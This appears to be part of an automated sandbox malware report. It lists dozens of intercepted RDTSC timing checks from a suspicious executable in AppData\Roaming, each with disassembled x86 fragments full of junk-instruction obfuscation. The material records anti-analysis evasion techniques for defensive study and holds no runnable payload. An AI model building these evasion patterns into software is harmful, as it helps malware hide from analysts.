Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5758CA second address: 5758E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F95FD7D899Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57593F second address: 57594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F95FD07A05Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 575DDB second address: 575DED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95FD7D8998h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 575E5D second address: 575E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5764D1 second address: 5764E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95FD7D899Ch 0x00000008 jo 00007F95FD7D8996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 576E76 second address: 576E84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579469 second address: 57946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 577692 second address: 577697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57946D second address: 57949F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F95FD7D8998h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D37C5h] 0x0000001a push 00000000h 0x0000001c mov esi, edx 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F95FD7D899Dh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57949F second address: 5794A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EA0 second address: 579EA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EA6 second address: 579EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EB0 second address: 579F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D1B14h] 0x00000011 push 00000000h 0x00000013 jbe 00007F95FD7D899Ch 0x00000019 mov dword ptr [ebp+122D1A4Fh], edx 0x0000001f mov di, E6B4h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F95FD7D8998h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F95FD7D89A1h 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579F07 second address: 579F0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579F0D second address: 579F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57A82A second address: 57A830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57A830 second address: 57A834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57B4FC second address: 57B55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push ebx 0x0000000b mov dword ptr [ebp+122D1C16h], esi 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D36A9h] 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D37E9h] 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 jmp 00007F95FD07A064h 0x00000029 jl 00007F95FD07A06Fh 0x0000002f jmp 00007F95FD07A069h 0x00000034 popad 0x00000035 push eax 0x00000036 jo 00007F95FD07A05Eh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57BF92 second address: 57BF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57BF96 second address: 57C022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F95FD07A062h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jnl 00007F95FD07A056h 0x00000017 jmp 00007F95FD07A065h 0x0000001c popad 0x0000001d jmp 00007F95FD07A05Eh 0x00000022 popad 0x00000023 nop 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F95FD07A058h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e push 00000000h 0x00000040 mov edi, 535267C2h 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122DB558h], edi 0x0000004d sub edi, dword ptr [ebp+122D2175h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 jg 00007F95FD07A056h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57C022 second address: 57C028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57CA5E second address: 57CACC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F95FD07A058h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1246FD6Eh], esi 0x0000002d pushad 0x0000002e call 00007F95FD07A068h 0x00000033 mov dh, ch 0x00000035 pop ecx 0x00000036 jmp 00007F95FD07A061h 0x0000003b popad 0x0000003c push 00000000h 0x0000003e movzx edi, dx 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57CACC second address: 57CAE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5809C0 second address: 5809C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 580F68 second address: 580FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F95FD7D899Ch 0x0000000b popad 0x0000000c nop 0x0000000d movzx edi, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F95FD7D8998h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D37F5h] 0x00000032 pushad 0x00000033 mov di, 7E9Fh 0x00000037 mov cx, di 0x0000003a popad 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ecx 0x00000040 call 00007F95FD7D8998h 0x00000045 pop ecx 0x00000046 mov dword ptr [esp+04h], ecx 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc ecx 0x00000053 push ecx 0x00000054 ret 0x00000055 pop ecx 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d jnc 00007F95FD7D8996h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 580FE2 second address: 580FE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EA6 second address: 582EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EAA second address: 582EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EB0 second address: 582F14 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D8998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D3531h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F95FD7D8998h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d xor edi, 2CE1A601h 0x00000033 sub dword ptr [ebp+1246F861h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F95FD7D8998h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push esi 0x00000059 pushad 0x0000005a popad 0x0000005b pop esi 0x0000005c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582F14 second address: 582F42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F95FD07A056h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F95FD07A064h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F95FD07A056h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582F42 second address: 582F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 583F21 second address: 583F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 583FAB second address: 583FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 586076 second address: 58607B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58607B second address: 586085 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95FD7D899Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58811E second address: 588133 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F95FD07A056h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588133 second address: 588183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F95FD7D8998h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D37F1h] 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D177Dh], esi 0x00000033 push 00000000h 0x00000035 mov edi, 071FE1D1h 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58929F second address: 5892A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5892A3 second address: 5892A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5892A9 second address: 5892C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F95FD07A05Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A410 second address: 58A414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A414 second address: 58A41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A41D second address: 58A474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub edi, dword ptr [ebp+1245D7B8h] 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+1246C0FEh], eax 0x00000017 mov bl, F9h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F95FD7D8998h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F95FD7D89A8h 0x0000003d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58D43C second address: 58D444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831CD second address: 5831D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594732 second address: 594753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F95FD07A068h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594753 second address: 594760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594760 second address: 594769 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E22 second address: 598E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E26 second address: 598E49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F95FD07A061h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F95FD07A056h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E49 second address: 598E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B74 second address: 536B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B7B second address: 536B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B81 second address: 536B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A060h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C60D second address: 59C613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C613 second address: 59C61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C61E second address: 59C622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5334FD second address: 53350D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53350D second address: 533529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F95FD7D8996h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95FD7D899Ah 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE44 second address: 59BE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE4E second address: 59BE79 instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD7D8996h 0x00000008 jmp 00007F95FD7D89A9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F95FD7D8996h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE79 second address: 59BE7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE7F second address: 59BEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F95FD7D89A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEA1 second address: 59BEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEAA second address: 59BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEAE second address: 59BEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C009 second address: 59C00E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C185 second address: 59C189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C189 second address: 59C18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C18F second address: 59C1CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95FD07A06Eh 0x00000008 jmp 00007F95FD07A068h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jno 00007F95FD07A05Eh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F95FD07A056h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F86B second address: 59F899 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95FD7D8998h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F95FD7D899Ch 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jns 00007F95FD7D899Ah 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F899 second address: 59F8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F95FD07A056h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F9AF second address: 59F9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F95FD7D8996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831D2 second address: 5831E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F95FD07A056h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831E3 second address: 5831E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
